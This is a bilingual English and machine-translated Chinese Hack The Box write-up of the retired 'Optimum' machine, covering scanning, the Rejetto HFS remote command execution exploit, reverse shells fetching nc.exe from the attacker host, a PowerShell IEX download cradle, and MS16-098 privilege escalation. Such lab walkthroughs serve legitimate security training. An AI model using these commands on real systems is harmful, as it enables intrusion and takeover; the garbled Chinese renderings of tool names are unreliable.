打破冷漠僵局文章_保持冷靜并打破僵局-最佳

打破冷漠僵局文章

Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them simulating real world scenarios and some of them leaning more towards a CTF style of challenge.

Hack The Box(HTB)是一個在線平臺，可讓您測試滲透測試技能。它包含一些不斷更新的挑戰。其中一些模擬現實世界的場景，而另一些則更傾向于CTF的挑戰風格。

Note. Only write-ups of retired HTB machines are allowed.

注意。 只允許注銷HTB機器。

Optimum is a beginner-level machine which mainly focuses on enumeration of services with known exploits. Both exploits are easy to obtain and have associated Metasploit modules, making this machine fairly simple to complete

Optimum是初學者級別的機器，主要致力于枚舉具有已知漏洞的服務。兩種漏洞利用都很容易獲得，并且具有關聯的Metasploit模塊，這使得該機器的安裝相當簡單

We will use the following tools to pawn the box on a Kali Linux box

我們將使用以下工具將盒子當成Kali Linux盒子

nmap
納帕
zenmap
禪地圖
searchsploit
searchsploit
metasploit
元胞

第1步-掃描網絡 (Step 1 - Scanning the network)

The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.

開發機器之前的第一步是進行一些掃描和偵察。

This is one of the most important parts as it will determine what you can try to exploit afterwards. It is always better to spend more time on that phase to get as much information as you could.

這是最重要的部分之一，因為它將決定您以后可以嘗試利用的內容。最好在該階段花費更多的時間以獲取盡可能多的信息。

I will use Nmap (Network Mapper). Nmap is a free and open source utility for network discovery and security auditing. It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

我將使用Nmap(網絡映射器)。 Nmap是一個免費的開源實用程序，用于網絡發現和安全審核。它使用原始IP數據包來確定網絡上可用的主機，這些主機提供的服務，它們正在運行的操作系統，使用的數據包過濾器/防火墻的類型以及許多其他特征。

There are many commands you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here

此工具可以使用許多命令來掃描網絡。如果您想了解更多信息，可以在這里查看文檔

I use the following command to get a basic idea of what we are scanning

我使用以下命令來了解我們正在掃描的內容

nmap -sV -O -F --version-light 10.10.10.8

-sV: Probe open ports to determine service/version info

-sV：探測打開的端口以確定服務/版本信息

-O: Enable OS detection

-O：啟用操作系統檢測

-F: Fast mode - Scan fewer ports than the default scan

-F：快速模式-掃描的端口少于默認掃描

--version-light: Limit to most likely probes (intensity 2)

--version-light：限制為最可能的探測(強度2)

10.10.10.8: IP address of the Optimum box

10.10.10.8： “最佳”框的IP地址

You can also use Zenmap, which is the official Nmap Security Scanner GUI. It is a multi-platform, free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users.

您也可以使用Zenmap，這是官方的Nmap Security Scanner GUI。它是一個多平臺，免費和開源的應用程序，旨在使Nmap易于初學者使用，同時為經驗豐富的Nmap用戶提供高級功能。

I use a different set of commands to perform an intensive scan

我使用一組不同的命令來執行密集掃描

nmap -A -v 10.10.10.8

-A: Enable OS detection, version detection, script scanning, and traceroute

-A：啟用操作系統檢測，版本檢測，腳本掃描和跟蹤路由

-v: Increase verbosity level

-v：提高詳細程度

10.10.10.8: IP address of the Optimum box

10.10.10.8： “最佳”框的IP地址

If you find the results a little bit too overwhelming, you can move to the Ports/Hosts tab to only get the open ports

如果發現結果有點不堪重負，則可以移至“ 端口/主機”選項卡以僅獲取打開的端口

We can see that there is 1 open port:

我們可以看到有1個開放端口：

Port 80. Hypertext Transfer Protocol (HTTP). Here it's an HttpFileServer httpd 2.3

端口 80 。超文本傳輸??協議(HTTP)。這是HttpFileServer httpd 2.3

For now, this is our main target

目前，這是我們的主要目標

第2步-訪問網站 (Step 2 - Visiting the website)

Let's try the port 80 and visit http://10.10.10.8

讓我們嘗試端口80并訪問http://10.10.10.8

We can see at the bottom of the page the server information. We have an HttpFileServer 2.3

我們可以在頁面底部看到服務器信息。我們有一個HttpFileServer 2.3

A HTTP File Server, also known as HFS, is a free web server specifically designed for publishing and sharing files.

HTTP文件服務器 ，也稱為HFS，是專門設計用于發布和共享文件的免費Web服務器。

The official documentation describes HFS as:

官方文檔將HFS描述為：

HFS (Http File Server) is a file sharing software which allows you to send and receive files. You can limit this sharing to just a few friends, or be open to the whole world. HFS is different from classic file sharing because there is no network. HFS is a web server which uses web technology to be more compatible with today's Internet. Since it is actually a web server, your friends can download files as if they were downloading from a website using a web browser, such as Internet Explorer or Firefox. Your users don't have to install any new software. HFS lets you share your files. Most web servers are used to publish a website, but HFS is not designed to do that. You are, however, free to use it in any way you wish, - but at your own risk.

HFS(Http文件服務器)是一種文件共享軟件，可讓您發送和接收文件。您可以將此共享限制為僅幾個朋友，或者向全世界開放。 HFS與經典文件共享不同，因為沒有網絡。 HFS是一種Web服務器，它使用Web技術與當今的Internet更加兼容。由于它實際上是一臺Web服務器，因此您的朋友可以像使用Web瀏覽器(例如Internet Explorer或Firefox)從網站下載文件一樣下載文件。您的用戶不必安裝任何新軟件。 HFS使您可以共享文件。大多數Web服務器都用于發布網站，但是HFS并非旨在這樣做。但是，您可以隨意使用它，但需要您自擔風險。

I use Searchsploit to check if there is any known vulnerability on HFS. Searchsploit is a command line search tool for Exploit Database

我使用Searchsploit來檢查HFS上是否存在任何已知漏洞。 Searchsploit是漏洞數據庫的命令行搜索工具

I use the following command

我使用以下命令

searchsploit HFS

We can see several vulnerabilities, but we will examine the Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit) with this command

我們可以看到幾個漏洞，但是我們將使用此命令檢查Rejetto HTTP文件服務器(HFS)-遠程命令執行(Metasploit)

searchsploit -x 34926.rb

We have a summary of the exploit and the code

我們對漏洞利用和代碼進行了總結

In the description we can see that the

在說明中，我們可以看到

Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a poor regex in the file ParserLib.pas. This module exploit the HFS scripting commands by using '%00' to bypass the filtering. This module has been tested successfully on HFS 2.3b over Windows XP SP3, Windows 7 SP1 and Windows 8.

由于文件ParserLib.pas中的正則表達式不正確，Rejetto HttpFileServer(HFS)容易受到遠程命令執行攻擊。此模塊通過使用'％00'繞過過濾來利用HFS腳本命令。此模塊已通過Windows XP SP3，Windows 7 SP1和Windows 8在HFS 2.3b上成功測試。

We can also find the exploit on the Exploit Database website

我們也可以在漏洞利用數據庫網站上找到漏洞利用

As well as on the Rapid7 website

以及Rapid7網站上

We know that the version of the application is HttpFileServer 2.3

我們知道該應用程序的版本是HttpFileServer 2.3

We will use Metasploit, which is a penetration testing framework. It's an essential tool for many attackers and defenders

我們將使用Metasploit ，這是一個滲透測試框架。對于許多攻擊者和防御者來說，這是必不可少的工具

I launch Metasploit Framework on Kali and look for command I should use to launch the exploit

我在Kali上啟動Metasploit框架 ，并尋找啟動漏洞利用程序所需的命令

If you want to get more info on the exploit, you can use the following command

如果要獲取有關漏洞利用的更多信息，可以使用以下命令

info exploit/windows/http/rejetto_hfs_exec

And you will get some detailed information on the exploit

您將獲得有關漏洞利用的一些詳細信息

I use the following command to use the exploit

我使用以下命令來使用漏洞利用程序

use exploit/windows/http/rejetto_hfs_exec

I need to set up several options before launching the exploit

啟動漏洞之前，我需要設置幾個選項

I start by setting the RHOSTS with the following command

我首先使用以下命令設置RHOSTS

set RHOSTS 10.10.10.8

and I set the SRHVOST with

然后將SRHVOST設置為

set SRHVOST 10.10.14.23

When I check the options, I get this

當我檢查選項時，我得到了

I ?then run the exploit with the command

然后，我使用命令運行漏洞利用程序

exploit

And I get a Meterpreter session

我得到了Meterpreter會議

From the Offensive Security website, we get this definition for Meterpreter

從“ 進攻性安全”網站上，我們獲得了Meterpreter的定義

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
Meterpreter是一種高級的，動態可擴展的有效負載，它使用內存中的 DLL注入暫存器，并在運行時通過網絡進行了擴展。它通過暫存器套接字進行通信，并提供全面的客戶端Ruby API。它具有命令歷史記錄，制表符完成，通道等功能。

You can read more about Meterpreter here.

您可以在此處閱讀有關Meterpreter的更多信息。

Let's start by gathering some information

讓我們開始收集一些信息

getuid returns the real user ID of the calling process and sysinfo returns certain statistics on memory and swap usage, as well as the load average

getuid返回調用過程的真實用戶ID， sysinfo返回有關內存和交換使用情況以及平均負載的某些統計信息

If we look closely, we can see that Optimum’s architecture is x64, but our meterpreter version is set to x86. We will need to change this!

如果仔細觀察，可以看到Optimum的體系結構是x64 ，但是我們的meterpreter版本設置為x86。我們將需要更改此設置！

I put this session in the background with the command

我使用以下命令將此會話置于后臺

background

I check the module options one more time and I see that the payload options are not correctly set up

我再次檢查模塊選項，發現有效載荷選項未正確設置

It is using

它正在使用

windows/meterpreter/reverse_tcp

instead of

代替

windows/x64/meterpreter/reverse_tcp

I set up the payload with the following command

我使用以下命令設置有效負載

set payload windows/x64/meterpreter/reverse_tcp

I get another meterpreter session, and when I check the sysinfo, I can see that I have the correct meterpreter version this time, x64/windows

我得到另一個meterpreter會話，當我檢查sysinfo時 ，可以看到這次我具有正確的meterpreter版本， x64 / windows

步驟3-尋找user.txt標志 (Step 3 - Looking for the user.txt flag)

Now that I have a session, I can list all the files/folders with the following command

現在我有了一個會話，我可以使用以下命令列出所有文件/文件夾

ls

And I find the user flag! I can check the content of the file with

而且我找到了用戶標志！我可以用檢查文件的內容

cat user.txt.txt

I try to navigate to the Administrator folder but got an access is denied message. I need to do a privilege escalation to capture the root.txt flag

我嘗試導航到Administrator文件夾，但收到拒絕訪問消息。我需要進行特權升級以捕獲root.txt標志

步驟4-使用Metasploit進行權限升級 (Step 4 - Using Metasploit for privilege escalation )

I will use the module post/multi/recon/local_exploiter_suggester

我將使用模塊post / multi / recon / local_exploiter_suggester

From the Rapid7 website, I get this

從Rapid7網站上，我得到了

This module suggests local meterpreter exploits that can be used. The exploits are suggested based on the architecture and platform that the user has a shell opened as well as the available exploits in meterpreter. It's important to note that not all local exploits will be fired. Exploits are chosen based on these conditions: session type, platform, architecture, and required default options.

該模塊建議可以使用的本地計費器利用。根據用戶打開外殼的體系結構和平臺以及meterpreter中的可用漏洞，建議利用漏洞。重要的是要注意，并非所有本地漏洞都會被解雇。根據以下條件選擇漏洞利用：會話類型，平臺，體系結構和所需的默認選項。

I check for the options and I list all the sessions to make sure to pick the right one

我檢查選項，并列出所有會話以確保選擇正確的會話

I set session 2 to point the exploit at the x64 meterpreter session

我將會話2設置為將漏洞利用指向x64 meterpreter會話

set SESSION 2

and set the description to have a detailed explanation of any suggested exploits

并設置說明以詳細說明任何建議的利用

set SHOWDESCRIPTION true

I launch the exploit but nothing seems to come back

我啟動了漏洞利用程序，但似乎什么也沒回來

Going back to the second sessions with

回到第二屆會議

sessions 2

and checking sysinfo once again gives us more information on the operating system. We can see it is a Windows 2012 R2

并再次檢查sysinfo可為我們提供有關操作系統的更多信息。我們可以看到它是Windows 2012 R2

I do a Google search to find any privilege escalation exploit on Windows 2012 R2 and find this exploit

我在Google搜索中找到Windows 2012 R2上的任何特權升級漏洞并找到了該漏洞

As well as the official Microsoft Security Bulletin on MS16-032

以及MS16-032上的官方Microsoft安全公告

Back on Metasploit, I check if there is any exploit available and I find one with

回到Metasploit，我檢查是否有可用的漏洞利用程序，并且發現

search ms16-032

I check the options and set up the session

我檢查選項并設置會話

set SESSION 3

the LHOST

失落的人

set LHOST 10.10.14.27

and the target to Windows x64

和目標到Windows x64

set TARGET 1

I check the options to see if everything is configured properly

我檢查選項以查看是否所有配置均正確

I launch the exploit but it doesn't seem to work anymore. I will need to exploit it manually without the help of Metasploit!

我啟動了該漏洞利用程序，但似乎不再起作用。我將需要在沒有Metasploit的幫助下手動利用它！

步驟5-創建一個低特權反向shell (Step 5 - Creating a low privilege reverse shell)

Back on searchsploit, I check the results from

回到searchsploit，我檢查了

searchsploit HFS

I can see several vulnerabilities, but I will examine the '2.3.x - Remote Command Execution (1)' first with this command

我可以看到幾個漏洞，但是我將首先使用此命令檢查“ 2.3.x-遠程命令執行(1)”

searchsploit -x 34668.txt

I have an explanation of the exploit

我對漏洞有一個解釋

I then examine the '2.3.x - Remote Command Execution (2)' with this command

然后，我使用此命令檢查“ 2.3.x-遠程命令執行(2)”

searchsploit -x 39161.py

I have a summary of the exploit and the code. I then have a look at the code and the description

我對漏洞利用和代碼進行了總結。然后，我看一下代碼和說明

You can use HFS (HTTP File Server) to send and receive files. It's different from classic file sharing because it uses web technology to be more compatible with today's Internet. It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux.

您可以使用HFS(HTTP文件服務器)發送和接收文件。它與經典文件共享不同，因為它使用Web技術與當今的Internet更加兼容。它也不同于傳統的Web服務器，因為它非常易于使用，并且可以“即開即用”地運行。通過網絡訪問您的遠程文件。它已在Linux下與Wine一起成功測試。

Then at the note that explains that it depends on a web server to download and leverage nc.exe to get the reverse shell

然后在注釋中說明，它依賴于Web服務器來下載并利用nc.exe來獲取反向Shell。

You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe)

您需要使用托管netcat的Web服務器(http：// <attackers_ip>：80 / nc.exe)

If you check the help section of searchsploit, we can copy an exploit to the current directory

如果您查看searchsploit的幫助部分，我們可以將漏洞利用復制到當前目錄

I use the following command to copy the file

我使用以下命令復制文件

searchsploit -m 39161.py

Then I use this command to modify the file

然后我用這個命令來修改文件

nano 39161.py

and change the hard coded IP address to the one of the attacking machine - my machine in this case

并將硬編碼的IP地址更改為攻擊機器之一-在這種情況下為我的機器

ip_addr = "10.10.14.27" #local IP address

I create a www folder

我創建一個www文件夾

and I copy nc.exe over

然后我復制nc.exe

I launch the exploit. On the first window on the top left, I launch a small python server with

我啟動漏洞利用程序。在左上方的第一個窗口中，我啟動了一個小型python服務器

python -m SimpleHTTPServer 80

The SimpleHTTPServer module that comes with Python is a simple HTTP server that provides standard GET and HEAD request handlers

Python隨附的SimpleHTTPServer模塊是一個簡單的HTTP服務器，它提供標準的GET和HEAD請求處理程序

The second window on the top right has netcat listening. I set up a Ncat listener on port 443 to catch the reverse shell connection

右上角的第二個窗口有netcat監聽。我在端口443上設置了Ncat偵聽器，以捕獲反向Shell連接

Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users
Ncat是一個功能豐富的聯網實用程序，可從命令行跨網絡讀取和寫入數據。 Ncat是為Nmap項目編寫的，是對久負盛名的Netcat的重新改進。它同時使用TCP和UDP進行通信，并且被設計為可靠的后端工具，可以立即為其他應用程序和用戶提供網絡連接。

You can learn more about Ncat here

您可以在此處了解有關Ncat的更多信息

nc -nvlp 443 10.10.10.8

The third window has the python exploit - I had to launch the script twice, one to trigger nc.exe and the other to get the reverse shell

第三個窗口具有python漏洞利用程序-我不得不啟動兩次腳本，一個觸發nc.exe ，另一個觸發反向shell。

The python exploit (3rd window) will connect to the python server (1st window) to download the nc.exe Windows binary. Then nc.exe connects back to the Ncat listener on port 443 (2nd window) and will create a low privilege reverse shell

python exploit(第三個窗口)將連接到python服務器(第一個窗口)，以下載nc.exe Windows二進制文件。然后nc.exe在端口443(第二個窗口)上連接回到Ncat偵聽器，并將創建一個低特權反向外殼程序

python 39161.py 10.10.10.8 80

You can check see the user is Kostas on this machine

您可以檢查用戶在此計算機上是否是Kostas

C:\Users\kostas\Desktop>

I can then navigate on Kostas machine to get the user flag!

然后，我可以在Kostas機器上導航以獲取用戶標志！

I check who I am on the machine with the command,

我通過命令檢查我在機器上的身份，

whoami

list the files/folders with

列出文件/文件夾

dir

and show the user flag content with

并顯示用戶標記內容

type user.txt.txt

I find the user flag! Let's get the root flag now :)

我找到了用戶標志！現在讓我們獲取根標志:)

步驟 6a- 使用 GDSSecurity / Windows-Exploit-Suggester (Step 6a - Using GDSSecurity/Windows-Exploit-Suggester)

I show the system information with

我用顯示系統信息

systeminfo

I copy/paste the findings on a systeminfo.txt file

我將調查結果復制/粘貼到systeminfo.txt文件中

I will use Windows-Exploit-Suggester from GDSSecurity

我將使用GDSSecurity的 Windows-Exploit-Suggester

This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.

此工具將目標補丁程序級別與Microsoft漏洞數據庫進行比較，以檢測目標上可能缺少的補丁程序。它還會通知用戶是否有可用于丟失公告的公用漏洞利用程序和Metasploit模塊。

It requires the 'systeminfo' command output from a Windows host in order to compare that the Microsoft security bulletin database and determine the patch level of the host.

它需要Windows主機的“ systeminfo”命令輸出，以便比較Microsoft安全公告數據庫并確定主機的補丁程序級別。

It has the ability to automatically download the security bulletin database from Microsoft with the --update flag, and saves it as an Excel spreadsheet.

它具有使用--update標志從Microsoft自動下載安全公告數據庫的功能，并將其另存為Excel電子表格。

I copy/paste the raw windows-exploit-suggester python script on a file and then modify the file

我將原始的windows-exploit-suggester python腳本復制/粘貼到文件上，然后修改該文件

nano windows-exploit-suggester.py

to paste the code from the GitHub repository. We now have our 2 files into the same folder, systeminfo.txt and windows-exploit-suggester.py

從GitHub倉庫粘貼代碼。現在，我們將2個文件放入相同的文件夾中，即systeminfo.txt和Windows-exploit-suggester.py

I can find out more about this tool with the following command

我可以使用以下命令找到有關此工具的更多信息

python windows-exploit-suggester.py -h

I update the database of the tool with the following command

我使用以下命令更新該工具的數據庫

python windows-exploit-suggester.py --update

I run the script with

我運行腳本

python windows-exploit-suggester.py --systeminfo systeminfo.txt --database 2019-10-08-mssb.xls

I can see that there are several missing CVEs on this machine. I will target the MS16-032 vulnerability

我可以看到這臺計算機上缺少幾個CVE。我將針對MS16-032漏洞

步驟6b-使用Sherlock枚舉KB (Step 6b - Using Sherlock to enumerate KBs)

I will use Sherlock to enumerate the KB on this machine. Sherlock is a PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.

我將使用Sherlock枚舉此計算機上的KB。 Sherlock是一個PowerShell腳本，可以快速找到缺少的本地補丁程序升級漏洞的軟件補丁。

You can learn more on Sherlock here

您可以在這里了解更多關于夏洛克的信息

When I ran the sysinfo command in Step 6a, I could see a list of KBs. KB stands for Knowledge Base. Microsfot defines it as

當我在步驟6a中運行sysinfo命令時，我可以看到KB列表。 KB代表知識庫。 Microsfot將其定義為

The Microsoft Knowledge Base has more than 150,000 articles. These articles were created by thousands of support professionals who have resolved issues for our customers. The Microsoft Knowledge Base is regularly updated, expanded, and refined to help make sure that you have access to the very latest information.

Microsoft知識庫中有超過150,000篇文章。這些文章是由成千上萬的支持專業人員創建的，他們為我們的客戶解決了問題。 Microsoft知識庫會定期更新，擴展和完善，以確保您可以訪問最新信息。

You can learn more on KB here

您可以在此處了解有關KB的更多信息

I git clone the Sherlock repository to my local and move it to the www/ folder

我將Sherlock儲存庫克隆到本地，然后將其移動到www /文件夾

I change the file Sherlock.ps1 and add Find-Allvulns at the end of the Powershell script with

我更改文件Sherlock.ps1并在Powershell腳本的末尾添加Find-Allvulns

nano Sherlock.ps1

I then use the following command

然后，我使用以下命令

wget "http://10.10.14.27//sherlock/Sherlock.ps1"

to fetch the file from Kostas' machine

從Kostas的計算機中獲取文件

I then launch Sherlock with the following command

然后，使用以下命令啟動Sherlock。

IEX(New-Object Net.Webclient).downloadString('http://10.10.14.27/sherlock/Sherlock.ps1')

It will go through all the KB

它將遍歷所有KB

and returns with which ones are vulnerable

以及那些易受傷害的人的回報

步驟7-使用RGNOBJ整數溢出進行特權升級 (Step 7 - Using RGNOBJ Integer Overflow for privilege escalation)

At Step 6a, when I got the result back from the Windows Exploit Suggester, one of the exploit targets Windows 8.1 (x64)

在步驟6a中 ，當我從Windows漏洞利用建議程序獲得結果時，其中一個漏洞利用目標是Windows 8.1(x64)

If we have a look at the Microsoft documentation, we can see that Windows Server 2012 R2 is related to Windows 8.1 and has the same build number. We can assume the exploit might work as well on it

如果我們查看Microsoft文檔，就會發現Windows Server 2012 R2與Windows 8.1相關，并且具有相同的內部版本號。我們可以假設該漏洞利用程序也可以正常工作

I look on searchsploit

我看著searchsploit

searchsploit m16-098

I can also find it on the Exploit Database website

我也可以在漏洞利用數據庫網站上找到它

I use the following command to copy the file

我使用以下命令復制文件

searchsploit -m 41020.c

The exploit needs to be compiled before it can be executed. I check the code with

該漏洞需要先編譯才能執行。我檢查代碼

cat 41020.c

I can see in the comments that the exploit has a pre-compiled Windows binary available that can be used

我可以在評論中看到該漏洞利用程序具有可用的預編譯的Windows二進制文件

I copy the exploit with the wget command and move the file to my www folder

我使用wget命令復制漏洞利用并將文件移動到我的www文件夾中

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe

I set up another python server - I kill the previous one.

我設置了另一個python服務器-我殺死了前一個。

python -m SimpleHTTPServer 80

On the other window, on Kostas machine I use powershell to download the exploit

在另一個窗口上，在Kostas機器上，我使用powershell下載漏洞利用程序

powershell wget "http://10.10.14.27/41020.exe" -outfile "exploit.exe"

I then execute the exploit with

然后，我使用

exploit.exe

I can see that the privilege escalation was a success by checking who I am on the machine

通過檢查我在計算機上的身份，我可以看到特權升級成功

whoami

It returns

它返回

nt authority\system

I am admin

我是管理員

Let's find the root flag now! I navigate up to Users and check in to the Administrator/Desktop folder. I find the flag!

讓我們現在找到根標志！我向上導航至“用戶”并簽入“管理員/桌面”文件夾。我找到了旗幟！

I use the following command to see the content of the file

我使用以下命令查看文件內容

type root.txt

Congrats! You found both flags!

恭喜！您找到了兩個標志！

Please don’t hesitate to comment, ask questions or share with your friends :)

請不要猶豫，發表評論，提問或與您的朋友分享:)

You can see more of my articles here

您可以在這里看到更多我的文章

You can follow me on Twitter or on LinkedIn

您可以在Twitter或LinkedIn上關注我

And don't forget to #GetSecure, #BeSecure & #StaySecure!

并且不要忘記＃ GetSecure ，＃ BeSecure和＃StaySecure ！

Other Hack The Box articles

其他Hack The Box文章

Keep Calm and Hack The Box - Lame
保持冷靜并砍箱子-me腳
Keep Calm and Hack The Box - Legacy
保持冷靜并打破常規-舊版
Keep Calm and Hack The Box - Devel
保持冷靜并打破僵局-開發
Keep Calm and Hack The Box - Beep
保持冷靜并砍箱子-嗶

翻譯自: https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-optimum/

打破冷漠僵局文章